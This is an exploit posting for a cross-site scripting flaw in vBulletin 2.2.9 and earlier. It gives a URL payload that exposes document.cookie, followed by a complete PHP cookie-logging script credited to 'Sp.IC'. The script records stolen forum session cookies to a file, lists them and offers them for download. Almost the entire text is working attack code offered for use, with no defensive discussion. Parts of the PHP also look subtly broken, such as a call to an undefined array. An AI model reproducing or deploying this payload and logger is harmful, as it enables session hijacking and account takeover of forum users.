Vulnerable systems: * Jelsoft vBulletin 2.2.9 and prior Exploit: s=23c37cf1af5d2ad05f49361b0407ad9e&what=">"<Scr*ipt>javascript:alert (document.cookie)</Scr*ipt> you can use this code (thanx for SP.IC): <?PHP // vBulletin XSS Injection Vulnerability: Exploit // --- // Coded By : Sp.IC (SpeedICNet@Hotmail.Com). // Descrption: Fetching vBulletin's cookies and storing it into a log file. // Variables: $LogFile = "Cookies.Log"; // Functions: /* If ($HTTP_GET_VARS['Action'] = "Log") { $Header = "<!--"; $Footer = "--->"; } Else { $Header = ""; $Footer = ""; } Print ($Header); */ Print ("<Title>vBulletin XSS Injection Vulnerability: Exploit</Title>"); Print ("<Pre>"); Print ("<Center>"); Print ("<B>vBulletin XSS Injection Vulnerability: Exploit</B>\n"); Print ("Coded By: <B><A Href=\"MailTo:SpeedICNet@Hotmail.Com\">Sp.IC</A></B><Hr Width=\"20%\">"); /* Print ($Footer); */ Switch ($HTTP_GET_VARS['Action']) { Case "Log": $Data = $HTTP_GET_VARS['Cookie']; $Data = StrStr ($Data, SubStr ($Data, BCAdd (0x0D, StrLen (DecHex (MD5 (NULL)))))); $Log = FOpen ($LogFile, "a+"); FWrite ($Log, Trim ($Data) . "\n"); FClose ($Log); Print ("<Meta HTTP-Equiv=\"Refresh\" Content=\"0; URL=" . $HTTP_SERVER_VARS['HTTP_REFERER'] . "\">"); Break; Case "List": If (!File_Exists ($LogFile) || !In_Array ($Records)) { Print ("<Br><Br><B>There are No Records</B></Center></Pre>"); Exit (); } Else { Print ("</Center></Pre>"); $Records = Array_UniQue (File ($LogFile)); Print ("<Pre>"); Print ("<B>.:: Statics</B>\n"); Print ("\n"); Print ("o Logged Records : <B>" . Count (File ($LogFile)) . "</B>\n"); Print ("o Listed Records : <B>" . Count ($Records) . " </B>[Not Counting Duplicates]\n"); Print ("\n"); Print ("<B>.:: Options</B>\n"); Print ("\n"); If (Count (File ($LogFile)) > 0) { $Link['Download'] = "[<A Href=\"" . $LogFile . "\">Download</A>]"; } Else{ $Link['Download'] = "[No Records in Log]"; } Print ("o Download Log : " . $Link ['Download'] . "\n"); Print ("o Clear Records : [<A Href=\"" . $SCRIPT_PATH. "?Action=Delete\">Y</A>]\n"); Print ("\n"); Print ("<B>.:: Records</B>\n"); Print ("\n"); While (List ($Line[0], $Line[1]) = Each ($Records)) { Print ("<B>" . $Line[0] . ": </B>" . $Line[1]); } } Print ("</Pre>"); Break; Case "Delete": @UnLink ($LogFile); Print ("<Br><Br><B>Deleted Succsesfuly</B></Center></Pre>") Or Die ("<Br><Br><B>Error: Cannot Delete Log</B></Center></Pre>"); Print ("<Meta HTTP-Equiv=\"Refresh\" Content=\"3; URL=" . $HTTP_SERVER_VARS['HTTP_REFERER'] . "\">"); Break; } ?> ----------------- Arab VieruZ thanX